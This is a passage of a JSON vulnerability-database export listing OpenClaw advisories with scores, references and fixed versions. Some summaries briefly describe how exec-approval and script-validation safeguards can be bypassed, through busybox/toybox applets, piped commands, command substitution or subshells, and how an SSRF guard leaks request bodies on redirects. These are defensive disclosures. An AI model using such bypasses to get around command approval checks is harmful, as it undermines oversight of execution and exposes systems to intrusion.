"generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42436" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes" }, { "reference_url": "https://github.com/advisories/GHSA-c4qm-58hj-j6pj", "reference_id": "GHSA-c4qm-58hj-j6pj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c4qm-58hj-j6pj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api", "purl": "pkg:npm/openclaw@2026.4.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14" } ], "aliases": [ "CVE-2026-42436", "GHSA-c4qm-58hj-j6pj" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6wth-qthz-yud8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89630?format=api", "vulnerability_id": "VCID-6y5w-am4s-6qa5", "summary": "OpenClaw: busybox and toybox applet execution weakened exec approval binding\n## Summary\n\nbusybox and toybox applet execution weakened exec approval binding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.23 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nOpaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification.\n\n## Technical Details\n\nThe fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations.\n\n## Fix\n\nThe issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `666f48d9b882a8a1415ca53f9567c72499d850c9`\n- PR: #65713\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43530", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19015", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21375", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21421", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43530" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/65713", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/65713" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43530", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43530" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution" }, { "reference_url": "https://github.com/advisories/GHSA-2cq5-mf3v-mx44", "reference_id": "GHSA-2cq5-mf3v-mx44", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2cq5-mf3v-mx44" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api", "purl": "pkg:npm/openclaw@2026.4.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12" } ], "aliases": [ "CVE-2026-43530", "GHSA-2cq5-mf3v-mx44" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6y5w-am4s-6qa5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89784?format=api", "vulnerability_id": "VCID-733f-57ds-xugm", "summary": "Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34425" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-rf75-g96h-j3rm", "reference_id": "GHSA-rf75-g96h-j3rm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rf75-g96h-j3rm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "GHSA-rf75-g96h-j3rm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-733f-57ds-xugm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88995?format=api", "vulnerability_id": "VCID-73cz-n29z-uqem", "summary": "Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects" }, { "reference_url": "https://github.com/advisories/GHSA-pg8g-f2hf-x82m", "reference_id": "GHSA-pg8g-f2hf-x82m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pg8g-f2hf-x82m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": 